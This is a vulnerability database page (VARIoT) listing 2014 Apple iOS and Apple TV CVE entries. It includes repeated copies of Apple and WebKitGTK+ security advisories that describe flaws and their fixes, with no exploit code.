VARIoT IoT vulnerabilities database
| VAR-201403-0265 | CVE-2014-1286 | Apple iOS SpringBoard lock-screen denial of service (DoS) vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
SpringBoard Lock Screen in Apple iOS before 7.1 allows remote attackers to cause a denial of service (lock-screen hang) by leveraging a state-management error. Supplementary information: CWE vulnerability type CWE-361 (Time and State) has been identified. Apple iOS is prone to multiple vulnerabilities.
Attackers can exploit these issues to perform man-in-the-middle attacks, access arbitrary files, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect Apple iOS versions prior to 7.1.
Note: The issue described by CVE-2013-6835 has been moved to BID 66108 (Apple iOS 'facetime-audio://' Security Bypass Vulnerability) for better documentation.
| VAR-201403-0264 | CVE-2014-1285 | Apple iOS SpringBoard access restriction bypass vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Springboard in Apple iOS before 7.1 allows physically proximate attackers to bypass intended access restrictions and read the home screen by leveraging an application crash during activation of an unactivated device. Apple iOS is prone to multiple vulnerabilities.
Attackers can exploit these issues to perform man-in-the-middle attacks, access arbitrary files, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect Apple iOS versions prior to 7.1.
Note: The issue described by CVE-2013-6835 has been moved to BID 66108 (Apple iOS 'facetime-audio://' Security Bypass Vulnerability) for better documentation.
| VAR-201403-0267 | CVE-2014-1289 | Arbitrary code execution vulnerability in WebKit as used in Apple iOS and Apple TV |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
WebKit, as used in Apple iOS before 7.1 and Apple TV before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than CVE-2014-1290, CVE-2014-1291, CVE-2014-1292, CVE-2014-1293, and CVE-2014-1294. WebKit, as used in Apple iOS and Apple TV, is prone to multiple memory-corruption vulnerabilities.
An attacker can exploit these issues to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
CVE-ID
CVE-2014-1297 : Ian Beer of Google Project Zero
For OS X Mavericks and OS X Mountain Lion systems, Safari 7.0.3
and Safari 6.1.3 may be obtained from Mac App Store.
For OS X Lion systems Safari 6.1.3 is available via the Apple
Software Update application.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-2 Apple TV 6.1
Apple TV 6.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with access to an Apple TV may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-1279 : David Schuetz working at Intrepidus Group
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
WebKit
Available for: Apple TV 2nd generation and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
-----END PGP SIGNATURE-----
| VAR-201403-0261 | CVE-2014-1281 | Apple iOS Photos Backend sensitive image data disclosure vulnerability |
CVSS V2: 1.9 CVSS V3: - Severity: LOW |
Photos Backend in Apple iOS before 7.1 does not properly manage the asset-library cache during deletions, which allows physically proximate attackers to obtain sensitive photo data by launching the Photos app and looking under a transparent image. Apple iOS is prone to multiple vulnerabilities.
Attackers can exploit these issues to perform man-in-the-middle attacks, access arbitrary files, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect Apple iOS versions prior to 7.1.
Note: The issue described by CVE-2013-6835 has been moved to BID 66108 (Apple iOS 'facetime-audio://' Security Bypass Vulnerability) for better documentation. The vulnerability is due to the program deleting images from the library without deleting the cached version of the image. An attacker could exploit this vulnerability to obtain sensitive photo data.
| VAR-201403-0266 | CVE-2014-1287 | Apple iOS and Apple TV USB Host arbitrary code execution vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
USB Host in Apple iOS before 7.1 and Apple TV before 6.1 allows physically proximate attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted USB messages. Apple iOS and TV are prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
The following products are vulnerable:
Apple iOS versions prior to 7.1
Apple TV versions prior to 6.1. The vulnerability is caused by memory corruption when the program processes USB information.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-2 Apple TV 6.1
Apple TV 6.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with access to an Apple TV may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-1279 : David Schuetz working at Intrepidus Group
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
WebKit
Available for: Apple TV 2nd generation and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
-----END PGP SIGNATURE-----
| VAR-201403-0262 | CVE-2014-1282 | Apple iOS and Apple TV Profiles component configuration profile visibility bypass vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
The Profiles component in Apple iOS before 7.1 and Apple TV before 6.1 allows attackers to bypass intended configuration-profile visibility requirements via a long name. Apple iOS and TV are prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-2 Apple TV 6.1
Apple TV 6.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with access to an Apple TV may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-1279 : David Schuetz working at Intrepidus Group
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
WebKit
Available for: Apple TV 2nd generation and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
-----END PGP SIGNATURE-----
| VAR-201403-0270 | CVE-2014-1292 | Arbitrary code execution vulnerability in WebKit as used in Apple iOS and Apple TV |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
WebKit, as used in Apple iOS before 7.1 and Apple TV before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than CVE-2014-1289, CVE-2014-1290, CVE-2014-1291, CVE-2014-1293, and CVE-2014-1294. WebKit, as used in Apple iOS and Apple TV, is prone to multiple memory-corruption vulnerabilities.
An attacker can exploit these issues to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-04-01-1 Safari 6.1.3 and Safari 7.0.3
Safari 6.1.3 and Safari 7.0.3 are now available and address the
following:
WebKit
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling. This issue was addressed through additional
validation of IPC messages.
CVE-ID
CVE-2014-1297 : Ian Beer of Google Project Zero
For OS X Mavericks and OS X Mountain Lion systems, Safari 7.0.3
and Safari 6.1.3 may be obtained from Mac App Store.
For OS X Lion systems Safari 6.1.3 is available via the Apple
Software Update application.
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
-----END PGP SIGNATURE-----
------------------------------------------------------------------------
WebKitGTK+ Security Advisory WSA-2015-0001
------------------------------------------------------------------------
Date reported : January 26, 2015
Advisory ID : WSA-2015-0001
Advisory URL : http://webkitgtk.org/security/WSA-2015-0001.html
Affected versions : 2.4 series before 2.4.1, 2.4.2 and 2.4.8.
CVE identifiers : CVE-2013-2871, CVE-2014-1292, CVE-2014-1298,
CVE-2014-1299, CVE-2014-1300, CVE-2014-1303,
CVE-2014-1304, CVE-2014-1305, CVE-2014-1307,
CVE-2014-1308, CVE-2014-1309, CVE-2014-1311,
CVE-2014-1313, CVE-2014-1713, CVE-2014-1297,
CVE-2013-2875, CVE-2013-2927, CVE-2014-1323,
CVE-2014-1326, CVE-2014-1329, CVE-2014-1330,
CVE-2014-1331, CVE-2014-1333, CVE-2014-1334,
CVE-2014-1335, CVE-2014-1336, CVE-2014-1337,
CVE-2014-1338, CVE-2014-1339, CVE-2014-1341,
CVE-2014-1342, CVE-2014-1343, CVE-2014-1731,
CVE-2014-1346, CVE-2014-1344, CVE-2014-1384,
CVE-2014-1385, CVE-2014-1387, CVE-2014-1388,
CVE-2014-1389, CVE-2014-1390.
Several vulnerabilities were discovered on the 2.4 stable series of
WebKitGTK+.
CVE-2013-2871
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to miaubiz.
CVE-2014-1292
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team.
CVE-2014-1298
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team.
CVE-2014-1299
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team, Apple, Renata Hodovan of
University of Szeged / Samsung Electronics.
CVE-2014-1300
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Ian Beer of Google Project Zero working with HP's Zero Day
Initiative.
CVE-2014-1303
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to KeenTeam working with HP's Zero Day Initiative.
CVE-2014-1304
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
CVE-2014-1305
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
CVE-2014-1307
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team.
CVE-2014-1308
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team.
CVE-2014-1309
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to cloudfuzzer.
CVE-2014-1311
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team.
CVE-2014-1313
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team.
CVE-2014-1713
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to VUPEN working with HP's Zero Day Initiative.
CVE-2014-1297
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Ian Beer of Google Project Zero.
WebKit, as used in Apple Safari before 6.1.3 and 7.x before 7.0.3,
does not properly validate WebProcess IPC messages, which allows
remote attackers to bypass a sandbox protection mechanism and read
arbitrary files by leveraging WebProcess access.
CVE-2013-2875
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to miaubiz.
core/rendering/svg/SVGInlineTextBox.cpp in the SVG implementation in
Blink, as used in Google Chrome before 28.0.1500.71, allows remote
attackers to cause a denial of service (out-of-bounds read) via
unspecified vectors.
CVE-2013-2927
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to cloudfuzzer.
CVE-2014-1323
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to banty.
CVE-2014-1326
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
CVE-2014-1329
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1330
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1331
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to cloudfuzzer.
CVE-2014-1333
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1334
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
CVE-2014-1335
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1336
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
CVE-2014-1337
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
CVE-2014-1338
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1339
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Atte Kettunen of OUSPG.
CVE-2014-1341
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1342
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
CVE-2014-1343
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1731
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to an anonymous member of the Blink development community.
core/html/HTMLSelectElement.cpp in the DOM implementation in Blink,
as used in Google Chrome before 34.0.1847.131 on Windows and OS X
and before 34.0.1847.132 on Linux, does not properly check renderer
state upon a focus event, which allows remote attackers to cause a
denial of service or possibly have unspecified other impact via
vectors that leverage "type confusion" for SELECT elements.
CVE-2014-1346
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Erling Ellingsen of Facebook.
WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4,
does not properly interpret Unicode encoding, which allows remote
attackers to spoof a postMessage origin, and bypass intended
restrictions on sending a message to a connected frame or window,
via crafted characters in a URL.
CVE-2014-1344
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
Credit to Ian Beer of Google Project Zero.
CVE-2014-1384
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
CVE-2014-1385
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
CVE-2014-1387
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
Credit to Google Chrome Security Team.
CVE-2014-1388
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
CVE-2014-1389
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
CVE-2014-1390
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
For the 2.4 series, these problems have been fixed in release 2.4.8.
Further information about WebKitGTK+ Security Advisories can be found
at: http://webkitgtk.org/security.html
The WebKitGTK+ team,
January 26, 2015
| VAR-201403-0260 | CVE-2014-1280 | Apple iOS and Apple TV video driver denial of service (DoS) vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Video Driver in Apple iOS before 7.1 and Apple TV before 6.1 allows remote attackers to cause a denial of service (NULL pointer dereference and device hang) via a crafted video file with MPEG-4 encoding. Supplementary information: CWE vulnerability type CWE-476 (NULL Pointer Dereference) has been identified. Apple iOS and Apple TV are prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
The following products are vulnerable:
Apple iOS versions prior to 7.1
Apple TV versions prior to 6.1.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-2 Apple TV 6.1
Apple TV 6.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with access to an Apple TV may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-1279 : David Schuetz working at Intrepidus Group
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
